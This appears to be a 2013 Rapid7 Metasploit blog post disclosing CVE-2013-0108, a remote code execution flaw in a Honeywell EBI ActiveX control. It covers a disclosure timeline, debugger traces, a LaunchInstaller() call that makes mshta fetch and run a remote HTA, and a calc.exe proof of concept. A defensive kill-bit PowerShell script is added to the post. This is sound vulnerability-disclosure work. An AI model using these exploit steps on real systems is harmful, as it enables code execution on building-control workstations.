Exploit for new Vulnerability on Honeywell EBI ActiveX (CVE-2013-0108)

Posted by Juan Vazquez in Metasploit on Mar 11, 2013 11:16:34 AM

Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing buildings systems, providing seamless digital information and control across all building operational management systems. Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:

Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.

The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.

Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern were both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A++++, would exploit again. (:

Vulnerability Summary

The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.

Disclosure Timeline

Date        Description
2013-01-08  Initial discovery by Juan Vazquez, Metasploit Researcher
2013-01-08  Metasploit module written
2013-01-10  Initial disclosure to the vendor, Honeywell
2013-01-10  Initial response from the vendor
2013-01-25  Disclosure to CERT/CC
2013-01-30  Disclosure coordination with vendor, CERT/CC, and ICS-CERT
2013-02-04  Vendor advisory bulletin and patch drafted
2013-02-22  Vendor advisory bulletin and patch release
2013-02-22  ICS-CERT Advisory published
2013-03-11  Public disclosure and Metasploit modules published
2013-03-12  Kill bits released on Microsoft Patch Tuesday (proposed)
2013-03-14  ICS-CERT Advisory updated

Technical Analysis

A remote page can make Internet Explorer load the vulnerable ActiveX control by referencing its class ID:

<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">

The vulnerable ActiveX control will be loaded by Internet Explorer:

0:006> g
ModLoad: 020b0000 020e7000 C:\WINDOWS\system32\HSCRemoteDeploy.dll
eax=00000003 ebx=00000000 ecx=020de070 edx=f20b0000 esi=00255ba8 edi=00000000
eip=7c90e4f4 esp=00137dc0 ebp=00137eb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
7c90e4f4 c3 ret
0:000> lmv m HSCRemoteDeploy
start end module name
020b0000 020e7000 HSCRemoteDeploy (deferred)
Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll
Image name: HSCRemoteDeploy.dll
Timestamp: Wed Sep 29 13:51:06 2010 (4CA3282A)
CheckSum: 0003DCC8
ImageSize: 00037000
File version: 5.7.165.119
Product version: 5.7.165.119
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Honeywell Limited
ProductName: HMIWeb
FileVersion: 5, 7, 165, 119
PrivateBuild: Official build
FileDescription: Unicode Release Build
LegalCopyright: Copyright 2008 Honeywell International Sàrl
LegalTrademarks: Copyright 2008 Honeywell International Sàrl

Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by passing an arbitrary URI as the "bstrServer" parameter. The prototype for this method is:

Sub LaunchInstaller (
    ByVal bstrServer As String,
    ByVal bstrRedirect As String,
    ByVal bUpgrade As Boolean
)

It can be abused in code such as:

RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false);

The above LaunchInstaller() call translates into the following call to ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure at 0013e200 as its argument:

0:000> bp HSCRemoteDeploy+866A
0:000> g
Breakpoint 0 hit
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b866a esp=0013e1ec ebp=0013e254 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x2e4a:
020b866a ff10 call dword ptr [eax] ds:0023:020d2644=d68d0b02
0:000> t
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b8dd6 esp=0013e1e8 ebp=0013e254 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x35b6:
020b8dd6 ff253c120d02 jmp dword ptr [HSCRemoteDeploy!DllUnregisterServer+0x1ba1c (020d123c)] ds:0023:020d123c={SHELL32!ShellExecuteExW (7ca02f03)}
0:000> dd esp L2
0013e1e8 020b866c 0013e200

The SHELLEXECUTEINFO structure passed as the parameter contains the following values:

Field         Value
lpVerb        open
lpFile        C:\WINDOWS\system32\mshta.exe
lpParameters  http://192.168.1.128:8080/System/Displays/RemoteInstallWelcome.hta

0:000> du poi(0013e200+C)
021040ac "open"
0:000> du poi(0013e200+10)
0210246c "C:\WINDOWS\system32\mshta.exe"
0:000> du poi(0013e200+14)
02104014 "http://192.168.1.128:8080/System"
02104054 "Displays/RemoteInstallWelcome.ht"
02104094 "a"

The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.
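Because the control is only reachable if Internet Explorer is willing to instantiate its CLSID, the practical defender-side check is the IE kill bit mentioned in the timeline. The PowerShell script below is an added example, not part of the Rapid7 post or Honeywell's code: it reports whether the HSC Remote Deploy control is registered, and audits (or with -Apply, sets) the kill bit for its CLSID. It assumes the standard registry locations (no Wow6432Node redirection) and an elevated session.

```powershell
# Added example: audit/set the IE kill bit for the HSC Remote Deploy ActiveX control.
# CLSID and DLL name come from the advisory text; 0x400 is the documented
# "Compatibility Flags" kill-bit value that stops IE from instantiating a control.
param([switch]$Apply)

$Clsid   = '{0D080D7D-28D2-4F86-BFA1-D582E5CE4867}'
$KillBit = 0x400
$KeyPath = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-KillBitState {
    # $true when the kill bit is already present in Compatibility Flags.
    if (-not (Test-Path $KeyPath)) { return $false }
    $flags = (Get-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    # OR 0x400 into any flags already set rather than overwriting them.
    if (-not (Test-Path $KeyPath)) { New-Item -Path $KeyPath -Force | Out-Null }
    $current = (Get-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' `
        -Value ($current -bor $KillBit) -Type DWord
}

# Is the control registered at all? InprocServer32's default value names the DLL.
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
$dll = if (Test-Path $inproc) { (Get-ItemProperty -Path $inproc).'(default)' } else { $null }
if ($dll) {
    $ver = (Get-Item $dll -ErrorAction SilentlyContinue).VersionInfo.FileVersion
    Write-Output "HSCRemoteDeploy registered: $dll (file version $ver)"
} else {
    Write-Output "Control not registered on this host."
}

if (Get-KillBitState) {
    Write-Output "Kill bit already set for $Clsid."
} elseif ($Apply) {
    Set-KillBit
    Write-Output "Kill bit set for $Clsid (state now: $(Get-KillBitState))."
} else {
    Write-Output "Kill bit NOT set for $Clsid; rerun with -Apply to set it."
}
```

On 64-bit Windows the 32-bit IE and control live under the Wow6432Node branches of both keys, so repeat the check there; the kill bit blocks the control in IE only and does not replace the vendor's Station Security Update Package.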

Exploitation

Since arbitrary HTA application execution is possible, arbitrary code execution follows, as the MSDN article Introduction to HTML Applications (HTAs) explains:

As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.

In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.

The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.

As a simple proof of concept, the next HTA application can be used to launch calc.exe:

<script>
  a = new ActiveXObject("WScript.Shell");
  a.run('%windir%\\System32\\calc.exe');
  window.close();
</script>

In order to achieve remote code execution, a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 with Internet Explorer 6 through Internet Explorer 9.

Source: https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi
